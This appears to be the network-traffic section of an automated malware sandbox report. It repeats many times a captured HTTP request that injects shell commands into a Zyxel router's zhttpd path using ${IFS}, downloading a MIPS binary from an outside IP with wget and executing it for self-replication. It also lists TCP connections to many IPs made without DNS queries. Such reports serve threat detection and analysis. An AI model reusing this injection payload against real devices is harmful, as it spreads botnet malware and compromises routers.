            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: unknownTCP traffic detected without corresponding DNS query: 25.5.71.117
            Source: unknownTCP traffic detected without corresponding DNS query: 107.233.1.231
            Source: unknownTCP traffic detected without corresponding DNS query: 176.103.102.163
            Source: unknownTCP traffic detected without corresponding DNS query: 25.5.71.117
            Source: unknownTCP traffic detected without corresponding DNS query: 198.247.197.23
            Source: unknownTCP traffic detected without corresponding DNS query: 97.79.107.232
            Source: unknownTCP traffic detected without corresponding DNS query: 107.233.1.231
            Source: unknownTCP traffic detected without corresponding DNS query: 183.129.157.55
            Source: unknownTCP traffic detected without corresponding DNS query: 82.162.24.63
            Source: unknownTCP traffic detected without corresponding DNS query: 1.195.222.46
            Source: unknownTCP traffic detected without corresponding DNS query: 166.12.142.170
            Source: unknownTCP traffic detected without corresponding DNS query: 198.224.75.161
            Source: unknownTCP traffic detected without corresponding DNS query: 122.87.224.191
            Source: unknownTCP traffic detected without corresponding DNS query: 27.21.125.122
            Source: unknownTCP traffic detected without corresponding DNS query: 132.106.96.197
            Source: unknownTCP traffic detected without corresponding DNS query: 111.227.8.37
            Source: unknownTCP traffic detected without corresponding DNS query: 92.236.0.49
            Source: unknownTCP traffic detected without corresponding DNS query: 157.156.123.238
            Source: unknownTCP traffic detected without corresponding DNS query: 191.71.162.83
            Source: unknownTCP traffic detected without corresponding DNS query: 87.176.14.14
            Source: unknownTCP traffic detected without corresponding DNS query: 206.16.237.101
            Source: unknownTCP traffic detected without corresponding DNS query: 1.195.222.46
            Source: unknownTCP traffic detected without corresponding DNS query: 198.247.197.23
            Source: unknownTCP traffic detected without corresponding DNS query: 97.79.107.232
            Source: unknownTCP traffic detected without corresponding DNS query: 191.71.162.83
            Source: unknownTCP traffic detected without corresponding DNS query: 1.106.86.51
            Source: unknownTCP traffic detected without corresponding DNS query: 183.129.157.55
            Source: unknownTCP traffic detected without corresponding DNS query: 82.162.24.63
            Source: unknownTCP traffic detected without corresponding DNS query: 192.212.193.22
            Source: unknownTCP traffic detected without corresponding DNS query: 157.156.123.238
            Source: unknownTCP traffic detected without corresponding DNS query: 134.130.14.209
            Source: unknownTCP traffic detected without corresponding DNS query: 124.138.142.98
            Source: unknownTCP traffic detected without corresponding DNS query: 122.87.224.191
            Source: unknownTCP traffic detected without corresponding DNS query: 67.72.242.104
            Source: unknownTCP traffic detected without corresponding DNS query: 208.179.124.48
            Source: unknownTCP traffic detected without corresponding DNS query: 87.176.14.14
            Source: unknownTCP traffic detected without corresponding DNS query: 166.12.142.170
            Source: unknownTCP traffic detected without corresponding DNS query: 36.216.221.166
            Source: unknownTCP traffic detected without corresponding DNS query: 147.39.138.141
            Source: unknownTCP traffic detected without corresponding DNS query: 27.21.125.122
            Source: unknownTCP traffic detected without corresponding DNS query: 132.106.96.197
            Source: unknownTCP traffic detected without corresponding DNS query: 94.237.78.34
            Source: unknownTCP traffic detected without corresponding DNS query: 206.16.237.101
            Source: unknownTCP traffic detected without corresponding DNS query: 12.82.3.248
            Source: unknownTCP traffic detected without corresponding DNS query: 198.224.75.161
            Source: unknownTCP traffic detected without corresponding DNS query: 97.146.81.95
            Source: unknownTCP traffic detected without corresponding DNS query: 54.23.74.245
            Source: unknownTCP traffic detected without corresponding DNS query: 1.106.86.51
            Source: unknownTCP traffic detected without corresponding DNS query: 134.130.14.209
            Source: unknownTCP traffic detected without corresponding DNS query: 52.107.133.72
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
